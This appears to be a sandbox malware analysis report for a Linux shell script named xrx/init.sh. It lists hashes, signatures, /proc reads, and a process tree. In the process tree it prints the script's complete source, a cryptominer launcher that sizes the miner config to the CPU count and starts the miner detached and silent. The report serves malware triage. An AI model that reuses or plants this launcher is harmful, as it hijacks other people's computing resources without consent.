747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Analysis

max time kernel
0s
max time network
131s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
26-11-2024 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xrx/init.sh
Size

1020KB
MD5

42693670c71a529a11e81943f5b36c5b
SHA1

9026cc25786215bba3bc06c4875f7da410425f8c
SHA256

eb2329422e52901d0bea0c0fcc4b3a6d1923ef278a96d2a14ab1839882cd0ecf
SHA512

a92d9bd9cd4c1c81a2e8042a9b7c31badba5e033743f34fb851b60350c5833afb246c64fc982112afecad9b1fc48bfdeab16a7bda169b4a635a8922549067d82
SSDEEP

12288:ztLJzlNZDaY9FnavUIqEhgvmKe36myOP7/67LN5kwrHNq9EnE:zvxNZD7FnavUILhgvJeb/67LFLNq9

Score

6^/10

discovery

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pidofgrep

description	ioc	Process
File opened for reading	/proc/983/cmdline	pidof
File opened for reading	/proc/1081/cmdline	pidof
File opened for reading	/proc/6/cmdline	pidof
File opened for reading	/proc/26/stat	pidof
File opened for reading	/proc/216/cmdline	pidof
File opened for reading	/proc/1282/cmdline	pidof
File opened for reading	/proc/1353/stat	pidof
File opened for reading	/proc/12/cmdline	pidof
File opened for reading	/proc/1065/cmdline	pidof
File opened for reading	/proc/1095/stat	pidof
File opened for reading	/proc/102/stat	pidof
File opened for reading	/proc/505/stat	pidof
File opened for reading	/proc/825/stat	pidof
File opened for reading	/proc/1129/cmdline	pidof
File opened for reading	/proc/1568/stat	pidof
File opened for reading	/proc/6/stat	pidof
File opened for reading	/proc/74/cmdline	pidof
File opened for reading	/proc/79/stat	pidof
File opened for reading	/proc/995/cmdline	pidof
File opened for reading	/proc/1129/stat	pidof
File opened for reading	/proc/1574/stat	pidof
File opened for reading	/proc/5/stat	pidof
File opened for reading	/proc/101/stat	pidof
File opened for reading	/proc/113/stat	pidof
File opened for reading	/proc/428/stat	pidof
File opened for reading	/proc/1161/cmdline	pidof
File opened for reading	/proc/1163/stat	pidof
File opened for reading	/proc/1261/stat	pidof
File opened for reading	/proc/1567/stat	pidof
File opened for reading	/proc/27/cmdline	pidof
File opened for reading	/proc/82/stat	pidof
File opened for reading	/proc/92/cmdline	pidof
File opened for reading	/proc/824/cmdline	pidof
File opened for reading	/proc/1167/stat	pidof
File opened for reading	/proc/83/cmdline	pidof
File opened for reading	/proc/97/stat	pidof
File opened for reading	/proc/630/stat	pidof
File opened for reading	/proc/96/cmdline	pidof
File opened for reading	/proc/162/cmdline	pidof
File opened for reading	/proc/210/stat	pidof
File opened for reading	/proc/262/stat	pidof
File opened for reading	/proc/534/stat	pidof
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/4/cmdline	pidof
File opened for reading	/proc/8/cmdline	pidof
File opened for reading	/proc/1253/cmdline	pidof
File opened for reading	/proc/858/stat	pidof
File opened for reading	/proc/1169/cmdline	pidof
File opened for reading	/proc/1231/stat	pidof
File opened for reading	/proc/83/stat	pidof
File opened for reading	/proc/92/stat	pidof
File opened for reading	/proc/224/stat	pidof
File opened for reading	/proc/1282/stat	pidof
File opened for reading	/proc/1440/stat	pidof
File opened for reading	/proc/9/stat	pidof
File opened for reading	/proc/11/cmdline	pidof
File opened for reading	/proc/15/cmdline	pidof
File opened for reading	/proc/851/stat	pidof
File opened for reading	/proc/993/stat	pidof
File opened for reading	/proc/2/stat	pidof
File opened for reading	/proc/218/cmdline	pidof
File opened for reading	/proc/667/stat	pidof
File opened for reading	/proc/1056/cmdline	pidof
File opened for reading	/proc/1107/stat	pidof

/tmp/xrx/init.sh
/tmp/xrx/init.sh
1⤵
PID:1570

/bin/bash
/tmp/xrx/init.sh -c "exec '/tmp/xrx/init.sh' \"\$@\"" /tmp/xrx/init.sh
1⤵
PID:1570

/tmp/xrx/init.sh
/tmp/xrx/init.sh
1⤵
PID:1570

/bin/bash
/tmp/xrx/init.sh -c " #!/bin/bash if [[ \$(cat config.json | grep xxcountxx) ]]; then echo \"configuring miner\" sed -i \"s/xxcountxx/\$(nproc)/g\" config.json else echo \"using preconfigured miner\" fi PID=\$(pidof xrx) if [ \$# -eq 0 ]; then ##if no arguments if [ -z \"\${PID}\" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo \"miner online\" else echo \"miner already online\" fi fi " /tmp/xrx/init.sh
1⤵
PID:1570
- /usr/bin/grep
  grep xxcountxx
  2⤵
  - Reads runtime system information
  PID:1573
- /usr/bin/cat
  cat config.json
  2⤵
  PID:1572
- /usr/bin/pidof
  pidof xrx
  2⤵
  - Reads runtime system information
  PID:1574

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads